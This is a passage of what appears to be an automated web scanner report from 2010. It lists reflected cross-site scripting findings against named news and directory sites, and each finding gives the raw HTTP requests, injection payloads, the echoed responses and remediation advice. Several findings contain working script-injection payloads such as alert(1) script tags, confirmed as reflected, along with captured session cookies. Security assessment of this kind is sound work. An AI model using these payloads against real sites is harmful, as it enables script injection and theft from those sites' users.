This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /case+million+Canadians/3938655363ab'%3b32caacdfa00/story.html HTTP/1.1
Host: www.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 62494
Expires: Sun, 19 Dec 2010 03:26:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:26:04 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=rqxow5jv2qeac5jgl2lgryan; path=/; HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/npo.com/case-million-canadians/3938655363ab';32caacdfa00/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=case-million-canadians;kw=3938655363ab';32caacdfa00;kw=npo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=27784504?"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18e89'%3b6ff09eac89f was submitted in the REST URL parameter 1. This input was echoed as 18e89';6ff09eac89f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /css18e89'%3b6ff09eac89f/main.min.css HTTP/1.1
Host: www.nationalpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:53 GMT
Date: Sun, 19 Dec 2010 03:03:53 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 48388
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76644'%3b9a5aecc8387 was submitted in the REST URL parameter 1. This input was echoed as 76644';9a5aecc8387 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /homes76644'%3b9a5aecc8387/Helen+Morris+Illegal+renos+such+drag/3994453/story.html HTTP/1.1
Host: www.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73097
Expires: Sun, 19 Dec 2010 03:24:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:24:58 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=yqqm4i551six2uyifcx4aaeb; path=/; HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/npo.com/homes76644';9a5aecc8387/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=homes76644';9a5aecc8387;kw=npo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=37716559?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b32ae'%3b4ebf56b551c was submitted in the REST URL parameter 3. This input was echoed as b32ae';4ebf56b551c in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /homes/Helen+Morris+Illegal+renos+such+drag/3994453b32ae'%3b4ebf56b551c/story.html HTTP/1.1
Host: www.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70316
Expires: Sun, 19 Dec 2010 03:25:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:25:19 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=ktjc3b55dknwqobtdfsor245; path=/; HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/npo.com/homes/helen-morris-illegal-renos-such-drag/3994453b32ae';4ebf56b551c/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=homes;kw=helen-morris-illegal-renos-such-drag;kw=3994453b32ae';4ebf56b551c;kw=npo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=4441 ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef9fc'%3b39db886712e was submitted in the REST URL parameter 1. This input was echoed as ef9fc';39db886712e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsef9fc'%3b39db886712e/IDMSquote.min.js HTTP/1.1
Host: www.nationalpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:54 GMT
Date: Sun, 19 Dec 2010 03:03:54 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 48416
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 123df'%3b818f6bb5eeb was submitted in the REST URL parameter 1. This input was echoed as 123df';818f6bb5eeb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js123df'%3b818f6bb5eeb/NPLib.min.js HTTP/1.1
Host: www.nationalpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:55 GMT
Date: Sun, 19 Dec 2010 03:03:55 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 48376
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecf66'%3ba94a0c62cd5 was submitted in the REST URL parameter 1. This input was echoed as ecf66';a94a0c62cd5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsecf66'%3ba94a0c62cd5/jquery.lazyload.mini.js HTTP/1.1
Host: www.nationalpost.com
Proxy-Connection: keep-alive
Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 03:03:51 GMT
Date: Sun, 19 Dec 2010 03:03:51 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Content-Length: 48485
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5995d'%3b491c5a1df17 was submitted in the REST URL parameter 1. This input was echoed as 5995d';491c5a1df17 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /related5995d'%3b491c5a1df17/topics/story.html HTTP/1.1
Host: www.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57650
Expires: Sun, 19 Dec 2010 02:59:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:59:01 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=ujjt3t55rlgdzaamtsjzvo45; path=/; HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/npo.com/related5995d';491c5a1df17/topics/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=related5995d';491c5a1df17;kw=topics;kw=npo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=87729630?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a97f9'%3bebec37cb034 was submitted in the REST URL parameter 2. This input was echoed as a97f9';ebec37cb034 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /related/topicsa97f9'%3bebec37cb034/story.html HTTP/1.1
Host: www.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 63469
Expires: Sun, 19 Dec 2010 02:59:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:59:08 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=ma2xk3mkknjbr045ribrypfx; path=/; HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/npo.com/related/topicsa97f9';ebec37cb034/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=related;kw=topicsa97f9';ebec37cb034;kw=npo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=91958526?"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 404d6'%3b45a0852ff96 was submitted in the REST URL parameter 1. This input was echoed as 404d6';45a0852ff96 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rss404d6'%3b45a0852ff96/feed.xml HTTP/1.1
Host: www.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Expires: Sun, 19 Dec 2010 02:58:49 GMT
Date: Sun, 19 Dec 2010 02:58:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48437
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 731ba'%3b12e30f386ab was submitted in the REST URL parameter 1. This input was echoed as 731ba';12e30f386ab in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search731ba'%3b12e30f386ab/index.html HTTP/1.1
Host: www.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:25:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:25:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 45868
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f112'%3bd82606ced4f was submitted in the REST URL parameter 1. This input was echoed as 2f112';d82606ced4f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /weather2f112'%3bd82606ced4f/index.html HTTP/1.1
Host: www.nationalpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 02:58:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 02:58:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 48531
1.330. http://www.newswire.ca/en/releases/archive/January2010/25/c3763.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.newswire.ca
Path: /en/releases/archive/January2010/25/c3763.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37dd0"><script>alert(1)</script>bc2eb9aceb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/releases/archive/January2010/25/c3763.html?37dd0"><script>alert(1)</script>bc2eb9aceb2=1 HTTP/1.1
Host: www.newswire.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 03:25:17 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 20377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.331. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c78eb'-alert(1)-'69ab2d17a81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c78eb'-alert(1)-'69ab2d17a81=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6F630E580B0CB321EE90CFE78D633FF5; __unam=c5114f2-12cfc9281ab-793cedb4-2; SPC=1292727684422-www.superpages.com-13613288-523135; s_sq=%5B%5BB%5D%5D; s_ppv=0; s_cc=true; s_lastvisit=1292727650045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660; s_vi=[CS]v1|2686BACD851D3EEE-4000010A6046DE64[CE]; OAX=rnneEk0NdZgACw4+; s_dfa=superpagescom; RMFD=011PU9WqO20escwY; s_pv=Business%20Profile;

Response
HTTP/1.0 200 OK
Date: Sun, 19 Dec 2010 03:38:37 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660;expires=Sun, 19-Dec-2010 03:53:37 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&c78eb'-alert(1)-'69ab2d17a81=1" rel="nofollow"> ...[SNIP]...
1.332. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 126d4"><script>alert(1)</script>bd8bb29c884 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?126d4"><script>alert(1)</script>bd8bb29c884=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6F630E580B0CB321EE90CFE78D633FF5; __unam=c5114f2-12cfc9281ab-793cedb4-2; SPC=1292727684422-www.superpages.com-13613288-523135; s_sq=%5B%5BB%5D%5D; s_ppv=0; s_cc=true; s_lastvisit=1292727650045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660; s_vi=[CS]v1|2686BACD851D3EEE-4000010A6046DE64[CE]; OAX=rnneEk0NdZgACw4+; s_dfa=superpagescom; RMFD=011PU9WqO20escwY; s_pv=Business%20Profile;

Response
HTTP/1.0 200 OK
Date: Sun, 19 Dec 2010 03:38:35 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660;expires=Sun, 19-Dec-2010 03:53:35 GMT;path=/
1.333. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.superpages.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9edb1--><script>alert(1)</script>6d4c4378f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?9edb1--><script>alert(1)</script>6d4c4378f09=1 HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6F630E580B0CB321EE90CFE78D633FF5; __unam=c5114f2-12cfc9281ab-793cedb4-2; SPC=1292727684422-www.superpages.com-13613288-523135; s_sq=%5B%5BB%5D%5D; s_ppv=0; s_cc=true; s_lastvisit=1292727650045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660; s_vi=[CS]v1|2686BACD851D3EEE-4000010A6046DE64[CE]; OAX=rnneEk0NdZgACw4+; s_dfa=superpagescom; RMFD=011PU9WqO20escwY; s_pv=Business%20Profile;

Response
HTTP/1.0 200 OK
Date: Sun, 19 Dec 2010 03:38:41 GMT
Server: Unspecified
Vary: Host
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660;expires=Sun, 19-Dec-2010 03:53:42 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a href="?SRC=&9edb1--><script>alert(1)</script>6d4c4378f09=1#" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e83c"-alert(1)-"2b3addc60f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/Placerville-CA9e83c"-alert(1)-"2b3addc60f4/PLA-L0122828089.htm HTTP/1.1
Host: www.superpages.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response
HTTP/1.1 200 OK
Server: Unspecified
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Set-Cookie: SPC=1292727588738-www.superpages.com-30487379-54978; Domain=.superpages.com; Expires=Fri, 18-Dec-2015 02:59:48 GMT; Path=/
Set-Cookie: JSESSIONID=D028F740E58EB1E89A1B41ABFED46054; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 105157
Date: Sun, 19 Dec 2010 02:59:49 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... ages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/Placerville-CA9e83c"-alert(1)-"2b3addc60f4/PLA-L0122828089.htm?="; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
